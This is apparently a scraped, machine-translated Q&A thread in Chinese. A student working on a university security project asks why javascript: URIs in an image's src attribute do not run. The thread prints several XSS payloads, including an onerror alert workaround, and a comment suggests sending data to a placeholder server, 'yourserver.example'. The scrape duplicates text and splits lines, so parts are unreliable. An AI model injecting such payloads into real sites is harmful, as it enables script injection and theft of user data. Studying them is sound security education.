图像的src属性内的Javascript范围
我必须为一个与安全相关的大学项目进行XSS攻击。我想存储一个在其源属性中包含恶意代码的图像。然而,我似乎没有从src属性访问任何javascript对象的权限 以下是我尝试过的一些事情:图像的src属性内的Javascript范围,javascript,security,xss,Javascript,Security,Xss,我必须为一个与安全相关的大学项目进行XSS攻击。我想存储一个在其源属性中包含恶意代码的图像。然而,我似乎没有从src属性访问任何javascript对象的权限 以下是我尝试过的一些事情: <img src="jAvascript:alert('XSS')"> 抛出:未定义引用错误警报 <img src="jAvascript:window.alert('XSS')"> 抛出:未定义引用错误窗口 <img src="j&am
<img src="jAvascript:alert('XSS')">
抛出:未定义引用错误警报
<img src="jAvascript:window.alert('XSS')">
抛出:未定义引用错误窗口
<img src="jAvascript:var x = new XMLHttpRequest();">
抛出:未定义引用错误XMLHttpRequest
<img src="jAvascript:var x = new XMLHttpRequest();">
这里的问题是什么?我如何访问站点的主窗口和我想要访问的对象
编辑:
OneError和所有其他事件都将被过滤。未执行
src
,因此无法工作
解决方法是使用onerror
:
<img src="wrong" onerror="alert('XSS')">
但是没有一个像样的框架容易受到这种攻击。这一评论并没有真正的帮助。为什么不执行?错误意味着它已被执行。您是否可以执行类似于
javascript:'http//yourserver.example?js='+Object
(看看到达服务器的是什么)?并非所有浏览器都容易受到此攻击。你的目标/测试浏览器是什么-我在Firefox上测试。没有办法通过img的src属性执行Javascript代码。(我假设引号是经过编码的)。你也读过这个吗?实际上,javascript
pseudo协议表示以下任何内容都被解释为javascript。@Gumbo在src属性上使用一个不太旧的浏览器?我不这么认为。